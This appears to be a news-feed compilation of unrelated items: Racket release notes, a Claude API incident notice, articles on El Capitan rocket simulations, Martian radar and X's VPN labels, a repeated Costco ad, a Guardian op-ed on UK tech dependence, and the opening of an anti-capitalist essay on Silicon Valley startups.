argument to thread creation.
Threads created with
#:keep
set to
'results
will record their results for later retrieval with
thread-wait
.
The
black-box
wrapper prevents the optimizing compiler from optimizing away certain computations entirely. This can be helpful in ensuring that benchmarks are accurate.
There are many other repairs and documentation improvements!
Thank you
The following people contributed to this release:
Alexander Shopov, Anthony Carrico, Bert De Ketelaere, Bogdan Popa, Cadence Ember, David Van Horn, Gustavo Massaccesi, Jade Sailor, Jakub Zalewski, Jens Axel Søgaard, jestarray, John Clements, Jordan Johnson, Matthew Flatt, Matthias Felleisen, Mike Sperber, Philip McGrath, RMOlive, Robby Findler, Ruifeng Xie, Ryan Culpepper, Sam Phillips, Sam Tobin-Hochstadt, Sebastian Rakel, shenleban tongying, Shu-Hung You, Stephen De Gabrielle, Steve Byan, and Wing Hei Chan.
Racket
is a community developed open source project and we welcome new contributors. See
racket/README.md
to learn how you can be a part of this amazing project.
Feedback Welcome
Questions and discussion welcome at the Racket community on
Discourse
or
Discord
.
If you can - please help get the word out to users and platform specific repo packagers
Racket - the Language-Oriented Programming Language - version 9.0 is now available from https://download.racket-lang.org
See https://blog.racket-lang.org/2025/11/racket-v9-0.html for the release announcement and highlights.
Replace this with your post text. Add one or more comma-separated Tags above. The special tag
DRAFT
will prevent the post from being published.
A fix has been implemented and we are monitoring the results.
Posted
Nov
23
,
2025
-
13:53
UTC
Update
We are continuing to investigate this issue.
Posted
Nov
23
,
2025
-
13:06
UTC
Investigating
We are currently investigating reports of the Claude API experiencing higher than normal failure rates. Our team is actively working to identify the root cause.
Posted
Nov
23
,
2025
-
13:05
UTC
This incident affected: Claude API (api.anthropic.com).
Gordon Bell finalist team pushes scale of rocket simulation on El Capitan
Researchers used Lawrence Livermore National Laboratory’s (LLNL) exascale supercomputer El Capitan to perform the largest fluid dynamics simulation ever — surpassing one quadrillion degrees of freedom in a single computational fluid dynamics (CFD) problem. The team focused the effort on rocket–rocket plume interactions.
El Capitan is funded by the National Nuclear Security Administration’s (NNSA) Advanced Simulation and Computing (ASC) program. The work — in part performed prior to the transition of the world’s most powerful supercomputer to classified operations earlier this year — is led by researchers from Georgia Tech and supported by partners at AMD, NVIDIA, HPE, Oak Ridge National Laboratory (ORNL) and New York University’s (NYU) Courant Institute.
The
paper
is a finalist for the 2025 ACM Gordon Bell Prize, the highest honor in high-performance computing. This year’s winner
— selected from a small handful of finalists — will be announced at the International Conference for High Performance Computing, Networking, Storage, and Analysis (SC25) in St. Louis on Nov. 20.
To tackle the extreme challenge of simulating the turbulent exhaust flow generated by many rocket engines firing simultaneously, the team’s approach combined a newly proposed shock-regularization technique called Information Geometric Regularization (IGR), invented and implemented by professors Spencer Bryngelson of Georgia Tech, Florian Schäfer of NYU Courant and Ruijia Cao (now a Cornell Ph.D. student).
Using all 11,136 nodes and more than 44,500 AMD Instinct MI300A Accelerated Processing Units (APUs) on El Capitan, the team achieved better than 500 trillion grid points, or 500 quadrillion degrees of freedom. They further extended this to ORNL’s Frontier, surpassing one quadrillion degrees of freedom. The simulations were conducted with
MFC
, a permissively licensed open-source code maintained by Bryngelson’s group. With these simulations, they represented the full exhaust dynamics of a complex configuration inspired by SpaceX’s Super Heavy booster.
The simulation sets a new benchmark for exascale CFD performance and memory efficiency. It also paves the way for computation-driven rocket design, replacing costly and limited physical experiments with predictive modeling at unprecedented resolution, according to the team.
Georgia Tech’s Bryngelson, the project’s lead, said the team used specialized techniques to make efficient use of El Cap’s architecture.
“In my view, this is an intriguing and marked advance in the fluid dynamics field,” Bryngelson said. “The method is faster and simpler, uses less energy on El Capitan, and can simulate much larger problems than prior state-of-the-art
— orders of magnitude larger.”
The team accessed El Capitan via prior collaborations with LLNL researchers and worked with LLNL’s El Capitan Center of Excellence and HPE to use the machine on the classified network. LLNL facilitated the effort as part of system-scale stress testing ahead of El Capitan's classified deployment, serving as a public example of the full capabilities of the system before it was turned over for classified use in support of the NNSA’s core mission of stockpile stewardship.
“We supported this work primarily to evaluate El Capitan’s scalability and system readiness,” said Livermore Computing’s Development Environment Group Leader Scott Futral. “The biggest benefit to the ASC program was uncovering system software and hardware issues that only appear when the full machine is exercised. Addressing those challenges was critical to operational readiness.”
While the actual compute time was relatively short, the bulk of the effort focused on debugging and resolving issues that emerged at full system scale. Futral added that internal LLNL teams, including those working on tsunami early warning and inertial confinement fusion, have also conducted full-system science demonstrations on El Capitan — efforts that reflect the Lab’s broader commitment to mission-relevant exascale computing.
A next-generation challenge solved with next-generation hardware
As private-sector spaceflight expands, launch vehicles increasingly rely on arrays of compact, high-thrust engines rather than a few massive boosters. This design provides manufacturing advantages, engine redundancy and easier transport, but also creates new challenges. When dozens of engines fire together, their plumes interact in complex ways that can drive searing hot gases back toward the vehicle’s base, threatening mission success, researchers said.
The solution depends on understanding how those plumes behave across a wide range of conditions. While wind tunnel experiments can test some of the physics, only large-scale simulation can see the full picture at high resolution and under changing atmospheric conditions, engine failures or trajectory shifts. Until now, such simulations were too costly and memory-intensive to run at meaningful scales, especially in an era of multi-rocket boosters, according to the team.
To break that barrier, the researchers replaced traditional “shock capturing” methods — which struggle with high computational cost and complex flow configurations — with their IGR approach, which reformulates how shock waves are treated in the simulation, enabling a non-diffusive treatment of the same phenomenon. With IGR, more stable results can be computed more efficiently.
With IGR in place, the team focused on scale and speed. Their optimized solver took advantage of El Capitan’s unified memory APU design and leveraged mixed-precision storage via AMD’s new Flang-based compiler to pack more than 100 trillion grid cells into memory without performance degradation.
The result was a full-resolution CFD simulation that ran across El Capitan’s full system — roughly 20 times larger than the previous record for this class of problem. The simulation tracked the exhaust from 33 rocket engines emitting exhaust at Mach 10, capturing the moment-to-moment evolution of plume interactions and heat recirculation effects in fine detail.
At the heart of the study was El Capitan’s unique hardware architecture, which is equipped with four AMD MI300A APUs per node — each combining CPU and GPU chips directly access the same physical memory. For CFD problems that require simultaneously high memory loads and performant computation, that design proved essential and comparatively harmless compared to the unified memory strategies required by separate-memory systems.
The team conducted scaling tests on multiple systems, including ORNL’s Frontier and the Swiss National Supercomputing Centre’s Alps. Only El Capitan supports a physically shared memory architecture. The system’s unified CPU–GPU memory, based on AMD’s MI300A architecture, allowed the entire dataset to reside in a single addressable memory space, eliminating data transfer overhead and enabling larger problem sizes.
“We needed El Capitan because no other machine in the world could run a problem of this size at full resolution without compromises,” said Bryngelson. “The MI300A architecture gave us unified memory with zero performance penalty, so we could store all our simulation data in a single memory space accessible by both CPU and GPU. That eliminated overhead, cut down the memory footprint and let us scale across the full system. El Capitan didn’t just make this work possible; it made it efficient.”
The researchers also achieved an 80-fold speedup over previous methods, reduced memory footprint by a factor of 25 and cut energy-to-solution by more than five times. By combining algorithmic efficiency with El Capitan’s chip design, they showed that simulations of this size can be completed in hours, not weeks.
Implications for spaceflight and beyond
While the simulation focused on rocket exhaust, the underlying method applies to a wide range of high-speed compressible flow problems — from aircraft noise prediction to biomedical fluid dynamics, the researchers said. The ability to simulate such flows without introducing artificial viscosity or sacrificing resolution could transform modeling across multiple domains and highlights a key design principle behind El Capitan: pairing breakthrough hardware with real-world scientific impact.
“From day one, we designed El Capitan to enable mission-scale simulations that were not previously feasible,” said Bronis R. de Supinski, chief technology officer for Livermore Computing. “We’re always interested in projects that help validate performance and scientific usability at scale. This demonstration provided insight into El Capitan’s behavior under real system stress. While we’re supporting multiple efforts internally — including our own Gordon Bell submission — this was a valuable opportunity to collaborate and learn from an external team with a proven code.”
New Costco Gold Star Members also get a $40 Digital Costco Shop Card*
Bleeping Computer
www.bleepingcomputer.com
2025-11-23 13:09:17
The holidays can be hard on any budget, but there may be a way to make it a little easier. Instead of dashing through the snow all around town, get all your shopping done under one roof at Costco. Right now, you can even get a 1-Year Costco Gold Star Membership plus a $40 Digital Costco Shop Card*, ...
The holidays can be hard on any budget, but there may be a way to make it a little easier. Instead of dashing through the snow all around town, get all your shopping done under one roof at Costco. Right now, you can even get a
1-Year Costco Gold Star Membership
plus a $40 Digital Costco Shop Card*, and it’s still only $65.
Shop at Costco for the holidays
Here’s how to get your Gold Star Membership and your Digital Costco Shop Card*. First, make sure to provide a valid email address when you make your purchase here. Within two weeks, you’ll be emailed your Digital Costco Shop Card*, which you can use online or in-store.
This offer is only available to new Costco members or former members who have let their Costco membership lapse for 18 months or longer.
Once you’re in the door, you can check out fresh-baked goods, load up on bulk groceries to cut back on repeat trips, or stock up on all the little home essentials like paper towels that seem to disappear the moment family is through the door.
Be sure to also look at the offerings on Costco.com to find everything from options for ordering your groceries or even planning a vacation. Your next trip might be through one of Costco’s exciting vacation packages.
Don’t forget to stop by the Costco food court on your way out for something hot, quick, and delicious. The hot dog meals are still only $1.50.
Here’s your chance to give your budget a little holiday treat.
*To receive a Digital Costco Shop Card, you must provide a valid email address and set up auto renewal of your Costco membership on a Visa® credit/debit card or Mastercard debit card at the time of sign-up. If you elect not to enroll in auto renewal at the time of sign-up, incentives will not be owed. Valid only for new members and those whose memberships (Primary and Affiliate) have been expired for at least 18 months. Valid only for nonmembers for their first year of membership. Not valid for upgrade or renewal of an existing membership. Promotion may not be combined with any other promotion. Costco employees are not eligible for new member promotions. Digital Costco Shop Card will be emailed to the email address provided by the Primary Member at time of sign-up within 2 weeks after successful sign-up and enrollment in auto renewal. Digital Costco Shop Card is not redeemable for cash, except as required by law. Costco is not liable for incentives not received due to entry of an invalid address during sign-up. Digital Costco Shop Cards are not accepted at the U.S. or Canada Food Court. Neither Costco Wholesale Corporation nor its affiliates are responsible for use of the card without your permission. Use the provided single-use promo code when entering your payment information. A Costco Gold Star Membership is $65 a year. An Executive Membership is an additional $65 upgrade fee a year. Each membership includes one free Affiliate Card. May be subject to sales tax. Costco accepts all Visa cards, as well as cash, checks, debit/ATM cards, EBT and Costco Shop Cards. Departments and product selection may vary. Offer expires 12/31/2025.
Disclosure: This is a StackCommerce deal in partnership with BleepingComputer.com. In order to participate in this deal or giveaway you are required to register an account in our StackCommerce store. To learn more about how StackCommerce handles your registration information please see the
StackCommerce Privacy Policy
. Furthermore, BleepingComputer.com earns a commission for every sale made through StackCommerce.
As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.
This free cheat sheet outlines 7 best practices you can start using today.
New Costco Gold Star Members also get a $40 Digital Costco Shop Card
Bleeping Computer
www.bleepingcomputer.com
2025-11-23 13:09:17
The holidays can be hard on any budget, but there may be a way to make it a little easier. Instead of dashing through the snow all around town, get all your shopping done under one roof at Costco. Right now, you can even get a 1-Year Costco Gold Star Membership plus a $40 Digital Costco Shop Card*, ...
The holidays can be hard on any budget, but there may be a way to make it a little easier. Instead of dashing through the snow all around town, get all your shopping done under one roof at Costco. Right now, you can even get a
1-Year Costco Gold Star Membership
plus a $40 Digital Costco Shop Card*, and it’s still only $65.
Shop at Costco for the holidays
Here’s how to get your Gold Star Membership and your Digital Costco Shop Card*. First, make sure to provide a valid email address when you make your purchase here. Within two weeks, you’ll be emailed your Digital Costco Shop Card*, which you can use online or in-store.
This offer is only available to new Costco members or former members who have let their Costco membership lapse for 18 months or longer.
Once you’re in the door, you can check out fresh-baked goods, load up on bulk groceries to cut back on repeat trips, or stock up on all the little home essentials like paper towels that seem to disappear the moment family is through the door.
Be sure to also look at the offerings on Costco.com to find everything from options for ordering your groceries or even planning a vacation. Your next trip might be through one of Costco’s exciting vacation packages.
Don’t forget to stop by the Costco food court on your way out for something hot, quick, and delicious. The hot dog meals are still only $1.50.
Here’s your chance to give your budget a little holiday treat.
*To receive a Digital Costco Shop Card, you must provide a valid email address and set up auto renewal of your Costco membership on a Visa® credit/debit card or Mastercard debit card at the time of sign-up. If you elect not to enroll in auto renewal at the time of sign-up, incentives will not be owed. Valid only for new members and those whose memberships (Primary and Affiliate) have been expired for at least 18 months. Valid only for nonmembers for their first year of membership. Not valid for upgrade or renewal of an existing membership. Promotion may not be combined with any other promotion. Costco employees are not eligible for new member promotions. Digital Costco Shop Card will be emailed to the email address provided by the Primary Member at time of sign-up within 2 weeks after successful sign-up and enrollment in auto renewal. Digital Costco Shop Card is not redeemable for cash, except as required by law. Costco is not liable for incentives not received due to entry of an invalid address during sign-up. Digital Costco Shop Cards are not accepted at the U.S. or Canada Food Court. Neither Costco Wholesale Corporation nor its affiliates are responsible for use of the card without your permission. Use the provided single-use promo code when entering your payment information. A Costco Gold Star Membership is $65 a year. An Executive Membership is an additional $65 upgrade fee a year. Each membership includes one free Affiliate Card. May be subject to sales tax. Costco accepts all Visa cards, as well as cash, checks, debit/ATM cards, EBT and Costco Shop Cards. Departments and product selection may vary. Offer expires 12/31/2025.
Disclosure: This is a StackCommerce deal in partnership with BleepingComputer.com. In order to participate in this deal or giveaway you are required to register an account in our StackCommerce store. To learn more about how StackCommerce handles your registration information please see the
StackCommerce Privacy Policy
. Furthermore, BleepingComputer.com earns a commission for every sale made through StackCommerce.
A highly reflective area over the base of the Martian south pole suggested the potential presence of liquid water. But new radar measurements suggest there may be another explanation. Credit: ESA/DLR/FU Berlin, CC BY-SA 3.0 IGO
Ancient Mars boasted abundant water, but the cold and dry conditions of today make liquid water on the Red Planet seem far less probable. However, the Mars Advanced Radar for Subsurface and Ionosphere Sounding (MARSIS)
detected
strong radar reflections from a 20-kilometer-wide area over the base of Mars's southern polar ice cap, hinting at the possibility of liquid water below the icy surface. Such a finding would have major implications for the planet's possible habitability.
But sustaining liquid water underneath the ice might not be feasible without very salty brines or localized volcanic heat. Scientists have deliberated about other possible "dry" explanations for the bright reflections detected by MARSIS, such as layers of carbon dioxide and water ices or salty ice and clay causing elevated radar reflectivity.
Aboard the Mars Reconnaissance Orbiter, the Shallow Radar (SHARAD) uses higher frequencies than MARSIS. Until recently, though, SHARAD's signals couldn't reach deep enough into Mars to bounce off the base layer of the ice where the potential water lies—meaning its results couldn't be compared with those from MARSIS.
However, the Mars Reconnaissance Orbiter team recently tested a new maneuver that rolls the spacecraft on its flight axis by 120°—whereas it previously could roll only
up to 28°
. The new maneuver, termed a "very large roll," or VLR, can increase SHARAD's signal strength and penetration depth, allowing researchers to examine the base of the ice in the enigmatic high-reflectivity zone.
Gareth Morgan and colleagues, for their
article
published in
Geophysical Research Letters
, examined 91 SHARAD observations that crossed the high-reflectivity zone. Only when using the VLR maneuver was a SHARAD basal echo detected at the site. In contrast to the MARSIS detection, the SHARAD detection was very weak, meaning it is unlikely that liquid water is present in the high-reflectivity zone.
The researchers suggest that the faint detection returned by SHARAD under this portion of the ice cap is likely due to a localized region of smooth ground beneath the ice. They add that further research is needed to reconcile the differences between the MARSIS and SHARAD findings.
More information:
Gareth A. Morgan et al, High Frequency Radar Perspective of Putative Subglacial Liquid Water on Mars,
Geophysical Research Letters
(2025).
DOI: 10.1029/2025gl118537
Provided by
Eos
This story is republished courtesy of Eos, hosted by the American Geophysical Union. Read the original story
here
.
Citation
:
Maybe that's not liquid water on Mars after all (2025, November 21)
retrieved 23 November 2025
from https://phys.org/news/2025-11-liquid-mars.html
This document is subject to copyright. Apart from any fair dealing for the purpose of private study or research, no
part may be reproduced without the written permission. The content is provided for information purposes only.
X.com Is Gonna Snitch You Out to the Public If You Use a VPN
Regular folks use
virtual private networks
(VPNs) to keep themselves safe from online data thieves, hackers, snoops, and crooks. Those who live, work, or travel in countries with oppressive human rights rely upon them not to get thrown in jail (or worse). Journalists and activists, likewise, depend on VPNs to keep them safe from the prying eyes of those who’d harm them.
Now it looks like people who use VPN to connect to X will get warning text shown on their profiles. It was hinted at by X last month, but we’re starting to see more evidence that it’s actually set to happen.
Videos by VICE
what it’ll look like
“When you read content on X, you should be able to verify its authenticity. This is critical to getting a pulse on important issues happening in the world,”
posted
Nikita Bier, Head of Product at X, back on October 14, 2025.
“As part of that, we’re experimenting with displaying new information on profiles, including which country an account is based, among other details. Starting next week, we will surface this on a handful of profiles of X team members to get feedback.”
Online security advocates immediately criticized the news, saying that it was a thinly veiled move to out those who use VPNs, which protect online anonymity by routing internet traffic through a third-party server as a middleman. VPNs are widely available to private citizens in most countries in the world, including the US, where X is based.
“Can users choose to opt out? (It) has potential privacy implications,” asked a user, to which Bier replied, “
There will be privacy toggles. However, if a user configures them, that will likely be highlighted on their profile. More to come.”
Well, we got more details, and it sure looks like X is outing those who use VPNs. “X will show a warning on your account if you try to use a VPN to hide where your account is from when the upcoming ‘About Your Account’ feature launches,” Aaron Perris, an analyst over at
MacRumors,
posted on X.com
on November 15, 2025.
The post accompanied a chunk of (ostensibly X.com’s) code showing the text it’ll display on your X profile to other X users: “‘One of our partners has indicated that you may be connecting via a proxy—such as a VPN—which may change the country or region that is displayed on your profile.’ Your profile will display ‘Country or region may not be accurate’ to other users.”
It’s a shitty move on X’s part. If X really wanted to keep its users safe, it would do something about the
severity
,
depth
, and
breadth of misinformation
that it allows on its platform. But hey, they can monetize that, so I wouldn’t hold my breath.
Shaders: How to draw high fidelity graphics with just x and y coordinates
Timed out getting readerview for https://deepnote.com/join-us
Has Britain become an economic colony?
Guardian
www.theguardian.com
2025-11-23 12:00:10
The UK could’ve been a true tech leader – but it has cheerfully submitted to US dominance in a way that may cost it dear Two and a half centuries ago, the American colonies launched a violent protest against British rule, triggered by parliament’s imposition of a monopoly on the sale of tea and the ...
T
wo and a half centuries ago, the American colonies launched a violent protest against British rule, triggered by parliament’s imposition of a monopoly on the sale of tea and the antics of a vainglorious king. Today, the tables have turned: it is Great Britain that finds itself at the mercy of major US tech firms – so huge and dominant that they constitute monopolies in their fields – as well as the whims of an erratic president. Yet, to the outside observer, Britain seems curiously at ease with this arrangement – at times even eager to subsidise its own economic dependence. Britain is hardly alone in submitting to the power of American firms, but it offers a clear case study in why nations need to develop a coordinated response to the rise of these hegemonic companies.
The current age of American tech monopoly began in the 2000s, when the UK, like many other countries, became almost entirely dependent on a small number of US platforms – Google, Facebook, Amazon and a handful of others. It was a time of optimism about the internet as a democratising force, characterised by the belief that these platforms would make everyone rich. The dream of the 1990s – naive but appealing – was that anyone with a hobby or talent could go online and make a living from it.
US tech dominance wasn’t the result of a single policy decision. Yet it was still a choice that countries made – as is highlighted by China’s decision to block foreign sites and build its own. While that move was far easier under an authoritarian system, it also amounted to an industrial policy – one that left China as the only other major economy with its own full digital ecosystem.
The pattern was sustained through the 2000s and 2010s. Cloud computing was quickly cornered by Amazon and Microsoft. No serious European or UK competitor emerged to challenge platforms such as Uber or Airbnb. These companies have undoubtedly brought us convenience and entertainment, but the wealth of the internet has not spread as widely as many hoped; instead, US firms took the lion’s share, becoming the most valuable corporations in history. Now the same thing is happening with artificial intelligence. Once more, the big profits look destined for Silicon Valley.
How did all this meet with such little resistance? In short, the UK and Europe followed the logic of free trade and globalisation. Nations, according to this theory, should focus only on what they do best. So just as it made sense for the UK to import French burgundies and Spanish hams, it also seemed logical to rely on American technology rather than trying to do it locally. Better to specialise instead in the UK’s own strengths, such as finance, the creative industries – or making great whisky.
But when it comes to these new platforms, the analogy with regular trade breaks down. There is a vast difference between fine wines and the technologies that underpin the entire online economy. Burgundies can be pricey, but they don’t extract value from every commercial transaction or collect lucrative data. The trade theories of the 1990s masked the distinction between ordinary goods and what are, in effect, pieces of market infrastructure – systems essential to buying and selling. That’s what Google and Amazon represent. A better analogy might be letting a foreign firm build toll roads across the country, charging whatever it likes to use them.
We’re seeing this again with the build-out of artificial intelligence. During President Trump’s state visit in September, the UK proudly celebrated
Google
and
Microsoft
’s investments in “datacentres” – vast warehouses of computer servers that power AI systems. Yet datacentres are the bottom rung of the AI economy, private infrastructure that simply channels profits back to US headquarters.
In another timeline, the UK could have been a true leader in AI. US researchers were once far behind their British and French counterparts. Yet, in a move neither Washington nor Beijing would have permitted, the UK cheerfully allowed the sale of most of its key AI assets and talent over the last decade or so –
DeepMind’s purchase
by Google being the most famous example. What remains is an AI strategy consisting of the supply of electricity and land for datacentres. It’s like being invited to a party only to discover you’re there to serve the drinks.
If tech platforms are indeed like toll roads, the logical step would be to limit their take – perhaps by capping fees or charging for data extraction. Yet no country has done so: we accept the platforms but fail to regulate their power as we do with other utilities. The European Union has come closest, with its
Digital Markets Act
, which regulates how dominant platforms treat dependent businesses. The US government, for its part, is also at the mercy of its homegrown tech giants, yet Congress remains paralysed.
If the UK wanted to take a different path, to resist this economic colonisation and extraction, it could partner with the European Union and perhaps Japan in order to develop a joint strategy – one that forces platforms to support local businesses and nurtures alternatives to mature US technologies. So far, though, alongside other nations disadvantaged by American dominance, it has been slow to adapt, instead hoping that the 90s playbook will still work, despite evidence to the contrary.
The truth is that we now live in a more cynical and strategic era. One way or another, the world needs an anti-monopoly framework with far greater force than anything seen so far. Wherever you live, it’s clear the world would be better off with more firms from different countries. The alternative is not only costly but politically dangerous, feeding resentment and dependence. We can do better than a future where what counts as economic freedom is merely a choice between relying on the United States, or relying on China.
Google, the Silicon Valley company
par excellence
, proclaimed to “organise the world’s information” and adopted “don’t be evil” as its corporate motto. And what could possibly be wrong with such aspirations? Indeed, most company leaders and high-tech workers, in the Valley, genuinely believe they are “making the world a better place” while also making money.
Silicon Valley is the progressive face of capitalism. We’ve experienced it, intimately. Billions of people, across the globe, enjoy real benefits from searching the world’s information, connecting with people across time and space, and carrying a supercomputers in their pockets. Silicon Valley doesn’t obviously throw workers into factories and mines for endless hours on low pay; such images are hidden, rendered distant by the supply chain . Instead, the Valley, in our imaginations, is populated by knowledge workers, a diverse and smart workforce that designs, solves, and codes in humane office spaces, with above average wages, ping pong, cafeterias, flexible working hours, sleeping cubicles. What’s not to like?
We could consider the Valley’s hidden workers, those who clean, wait tables, wash cars, nanny, deliver packages, tend gardens, fix infrastructure for poverty wages; we could explore the trailer parks down the road from Google HQ, or document the shootings in the streets, the homeless that push shopping trolleys up and down the El Camino, their world a bundle of rags; or the gun shops that sell semi-automatics, the out-of-control, over-staffed police, armed with military-grade cast-me-downs, that regularly gun down the poor; the families crowded into small apartments, the father who spends his days scouring trash bins for recyclable bottles to trade for cash, the human trafficking of women, the prostitution, coerced to serve a predominately male workforce; or the disciplining and harassment of the undocumented, the deportations, the splitting up and destruction of families; or the local charities that collect food for kids, during seasonal holidays, since outside of school time their families cannot provide; or the extraordinarily high incarceration rates that control the surplus labour force, the armed guards on campuses and in schools, office complexes and shop interiors; or the poverty, the child who cannot concentrate in class since their teeth are rotting in their mouth, the extreme and devastating inequalities in wealth and income, the untreated illnesses and injuries, for lack of medical access, the widespread use of antidepressants, the addictions, the dispossessed, the broken dreams and the crying …
Yet these symptoms of a broken and decaying society are studiously ignored, repressed, unmentioned by Silicon Valley’s middle and upper classes. Psychological repression is widespread amongst the highly paid of the Valley. It’s a defence: it’s just too damn painful to contemplate the full horror of social reality. And life can be organised to avoid it, or deny it. So many don’t even notice.
I could mention all the evil business models, where vast computing power and fancy algorithms trawl our digital footprints to track and surveil, to sell and manipulate, to intensify our addictions; and we might reflect on the Valley’s enormous and continuing contributions to building military machines that rain down death and destruction.
Instead, here, in this article, I want to point to the root problem,
the ultimate source of evil
, and explain why Silicon Valley is hypocrisy on a grand scale. The Valley’s movers and shakers believe they are progressive, that entrepreneurial capitalism is the road to utopia. But it’s not. In fact, the opposite is the case: the Valley is a cause of this horror, of the social ills, and the social breakdown that it must repress: it is both responsible and culpable for creating a dystopia.
I want all the talented, hopeful, optimistic high-tech workers, who genuinely want to make the world a better place, who are about to found a new and exciting startup, to just take a short pause, to stop, look around, think, reflect and reconsider:
the kind of firm you incorporate, the institutional rules you adopt, is precisely the choice point between doing evil and doing good
.
I will try to explain. My apologies if it takes a little while, since if the following facts were readily understood and generally accepted, then Silicon Valley would already be good, not evil, and I wouldn’t need to explain.
Silicon Valley: midwife of the capitalist firm
The Valley is all about startups. They spring up all the time. New exciting and hopeful adventures. It’s like forming a band, but better.
In huge, mature corporations the social relations of production are obscured by layers of hierarchy and absentee ownership. But in a startup the power relations are direct and visible, and often share an office with you. You can observe the basic unit of production in capitalism—the capitalist firm—as if under a microscope.
Let’s lay out the property relations of a (slightly simplified) typical startup.
The startup has owner(s), usually “high net worth” individuals, either directly present or indirectly in the form of venture capital firms. Venture capital provides the initial funds for the new venture. The actual founders, the ones with the ideas and talent, but no money, also part own the firm. The divvying up of the initial share issue between founders and early investors is a detail. The founders, armed with a new injection of capital, then recruit workers by convincing them of “the vision”. These are the first employees. And off we go.
The owner(s) of the startup are in complete control, and their decisions are final. Owners can promote, demote, hire and fire anyone, at any time. Owners set wage levels, which are kept secret (and the workers, being earnest and highly disciplined, avoid this subject with each other—that would break a taboo). Startups are definitely not run on democratic lines: workers don’t get to appoint managers, set strategy, or distribute profits. Instead, the startup is a mini dictatorship: sure, there’s plenty of technical debate, and back-and-forth, and head scratching, but ultimately it’s a dictatorship.
The owners pays all input costs—such as office rental, computers, electricity and heating, labour etc. They own all outputs, such as new software or hardware, and any inventions (which, in the Valley, are aggressively patented). The owners are liable for any profits and losses of the company. The startup’s bank accounts are hidden from the workers, and out of their control.
This basic social relation—between profit-taking capitalist owners and wage-earning workers—is constitutive of capitalism. For example, today you can travel to Shropshire, England, and visit Ironbridge village, one of the birthplaces of the industrial revolution and “the silicon valley of the 1800s”. You can tour an early ironworks and see the great furnaces where workers toiled, the tiny administrative office (to dole out wages, and keep accounts), and nearby, on a large hill overlooking the site, the capitalists’ large and imposing mansions.
The form may have changed, but not the content. In this sense, Silicon Valley is deeply conservative. It proclaims to disrupt everything, and make all fresh, new and shiny—except this basic social relationship.
Almost all Silicon Valley workers accept these social relations as entirely natural, acceptable, and pretty much fair and equitable. The owners fund the company. They therefore “own the firm”. The owners risk a lot of capital, and the workers receive a good wage, based on supply and demand in the marketplace, plus some ramp-up time to try and invent new stuff, which is fun. What’s not to like? What’s the problem?
Silicon Valley: it’s theft all the way down
Startups reproduce, in embryo form, the wage system, where the capitalist owner hires-in labour at a pre-agreed rental price. In a capitalist firm, labour is just an another
ex ante
cost of production. The workers mix their labour with inputs and produce an output for sale. Normally, firms sell at prices that exceed their costs of production, which includes the cost of used-up inputs, rent, interest on capital loans, and wage costs etc. Any residual income then gets distributed as profit to the owner, or owners, of the firm.
Imagine that you and I agree to exchange something in the marketplace, say a second-hand iPhone on Ebay. You get the money, I get an iPhone. You may get a good deal, or I may get a good deal, depending on our “higgling and haggling” in the marketplace. Whether a fair price is struck, or not, there’s an exchange of something for something: some goods for some money. This social transaction satisfies a “principle of exchange”. We’ve swapped stuff, and no-one forced us to.
But let’s say I just took the iPhone from you. And you received no money at all. This violates the principle of exchange. I got something for nothing: some goods, some resources, for free. That’s theft. Obviously so.
All startups in Silicon Valley violate the principle of exchange and institute a system of theft
. They are theft-based institutions. If the startup is successful and grows, so does the theft, since theft is baked into the institutional structure of the firm, right from the get go. If the startup goes global, like an Apple, Facebook, or Google, then the cancer spreads and the theft takes place on a global scale.
But the theft is hidden. We need some reflection to really see it.
The workers in a startup are the actual cause of any profits it makes. We can demonstrate this with a simple thought experiment: imagine the workers stopped working. Would the firm have any possibility of making a profit, or if already profitable, continue to make that profit? But we don’t need to imagine. This is called a strike. And owners hate it, since it kills their profit.
So, in any company, including a startup, the workers create the value.
What, then, do the owners contribute or create?
The owners, or venture capitalists, contribute capital. They advance money to fund the startup until it (hopefully) starts making money. And then they expect a return. Since they’ve given something they should definitely get something back, otherwise we violate the principle of exchange. In fact, they should expect repayment of the sums advanced and—let’s be generous here—also a risk premium (since most startups fail without making profit) and, also—in order to be really straight and fair about this—some collateral as security (such as first dibs on any outstanding assets if the venture fails). This seems like a fair exchange.
It is. So far so good.
But if early investors merely did this—that is, simply advance some
loan capital
—they would not become the owners of the firm. Once the startup made money, the loan would be repaid (by the firm), and the early investors would have no further claims on the fruits of others’ labour (that is the value created by the workers).
The important point is this: loan capital does not violate the principle of exchange.
But Silicon Valley startups are not funded by loan capital. Venture capitalists want, and get, much more than this. They advance capital to a firm, but in addition to being repaid, they demand ownership of the firm, i.e.
equity capital
, and receive stock (shares in the firm). And so they “own the firm”. In consequence, once their initial loan and risk premium is repaid, they get even more: they retain a claim on the firm’s future income, that is the fruits of others’ labour
in perpetuity
(or until the firm dissolves, or they sell their shares etc.)
And the mere legal ownership of a firm is
sufficient
to lay claim on its profit. And, right here, is precisely the moment when the principle of exchange is violated. Once the firm repays its debt then the early investors are now made whole. Beyond this point, we have workers creating profits, and owners appropriating that profit without needing to contribute an hour of their time, or a dime from their pockets. The owners are getting something for nothing. The owners can, as John Stuart Mill put it: “grow richer, as it were in their sleep”. There’s no exchange. Just appropriation. And that is what’s commonly, and accurately, called economic exploitation.
The important point is this: equity capital violates the principle of exchange.
Sometimes the meaning of a social situation can suddenly flip. You notice something new, like an object in the wrong place, or a small inconsistency that points to a secret, or a lie. This is one of those occasions. There’s an enormous difference between
advancing
capital to a firm, and
owning
a firm. This vital distinction is conspicuously absent from all the upbeat, world-changing, and progressive chit-chat in the coffee shops, restaurants, offices and homes of Silicon Valley. So let’s pretend they might be listening, that all their chatter stops, just for a moment, and we whisper into each and every individual ear:
equity capital is theft
.
When you take profits, but contribute
nothing
to the output of a firm, other than holding a paper claim, you are stealing.
Yet this is how startups in Silicon Valley are organised. Cohort after cohort of “smart” groups of highly educated workers are quite happy to sign up to their own exploitation, and cede control over how they organise their working day, and what they produce. The most effective prison is the one you don’t realise you’re in.
But hold on. Look, we’ve woken the libertarian consciousness of Silicon Valley, and its rationality is strong and terrible: those that were whispered to have been stirred, and they reply, in unison: No-one forces workers to accept these terms, and the wage contract is voluntary, and therefore perfectly OK! Go away, annoying socialist, and stop spoiling our fun!
Silicon Valley: forcing people to sell their labour
Do workers freely enter into the wage contract? Do founders, with great ideas, have the freedom to start new commercial ventures that aren’t based on theft? To answer, let’s first define non-exploitative social relations of production.
